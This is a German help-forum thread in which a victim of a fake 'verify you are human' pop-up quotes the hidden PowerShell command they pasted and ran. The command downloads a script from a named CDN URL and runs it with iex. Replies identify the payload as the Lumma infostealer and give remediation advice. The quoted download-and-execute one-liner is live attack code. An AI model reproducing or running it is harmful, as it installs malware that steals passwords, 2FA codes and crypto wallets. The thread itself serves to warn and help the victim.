Hilfe leutes Computer gehackt?
Moim leutes, ich hab voll den angst gerade, ich hab ausversehen bei einem Pop Up, geklickt, da stand um mich als mensch zu verifizieren muss ist WIN + R, STRG V eingeben, ich musste folgendes ausführen: powershell.exe -W Hidden -command $url = 'https://studla.b-cdn.net/mine/carted/delta/bhindar.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
das musste ich ausführen und hab es dann auch gemacht, was macht dieser befehl und sollte ich angst haben? voll den angst gehabt gerade
3 Antworten
Moin,
ich kann zwar aktuell keine Analyse durchführen, aber häufig sind diese exakte Masche Infostealer. Jedenfalls als ich diesen Scam das letzte Mal untersucht habe.
Das hier kann dennoch eine Infektion mit Schadsoftware bewirkt haben, also bitte installiere dein Betriebssystem neu!
Weil es höchstwahrscheinlich ein Infostealer war, solltest du dringend deine Passwörter von einem anderen Gerät ändern. Bitte möglichst schnell!
Wenn du möchtest, kann ich später eine Analyse von diesem Exemplar durchführen.
Cheers
Da bin ich wieder. Ich habe mir das Skript genauer angesehen. Es lädt dir eine .zip Datei herunter, entpackt diese und führt die schädliche Datei "EditLoc.exe" aus. Diese ist ein Luma Stealer, wie ich erwartet habe. Der klaut dir so ziemlich alles vom System, von Passwörtern und 2FA-Codes über Crypto-Wallets bis hin zur Zwischenablage. Ich hoffe, du hast deine Passwörter schon geändert!
Ich empfehle immer noch, dein System neu zu installieren, auch, wenn Lumma normalerweise nicht bleibt, sondern nur einmal ausgeführt wird. Sicher ist sicher.
-- Nachtrag: Aufgrund deiner zweiten Frage, die du gepostet hast, schätze ich, dass dieses Exemplar auf deinem System BLEIBT. Also zurücksetzen!!!
Du bist schon, sorry wenn ich das schreibe, ziemlich dämlich.
Den Link klicke ich sicher nicht an. SIeht aber so aus, als missbraucht dich nun jemand zum Bitcoin Minen.
Das war ein Pop-up, ich bin bisschen älter und wusste es nicht, mein sohn hat mir das dann erklärt.
Niemals einfach etwas ausführen, wenn du keine Ahnung hats, was es macht.
Setze deinen Computer auf eine frühere Version zurück. Das kannst du im Internet nachlesen, wie das geht.
Ja, das ist definitiv Malware. Beim nächsten mal vorher fragen.
Windows defender hat also nicht reagiert? Laut VirusTotal erkennt er diesen Trojaner eigentlich, aber vielleicht nicht, wenn man es über Powershell runterlädt und ausführt.
Evtl zB mal Malwarebytes ausprobieren.
Oder Windows defender mal einen Komplett Check ausführen lassen.
Ansonsten kann man das mit etwas Glück auch manuell wieder entfernen.
Hab Windows defender mal nen checker gemacht und malwarebytes auch da kam nix raus
Bitte versuch das mal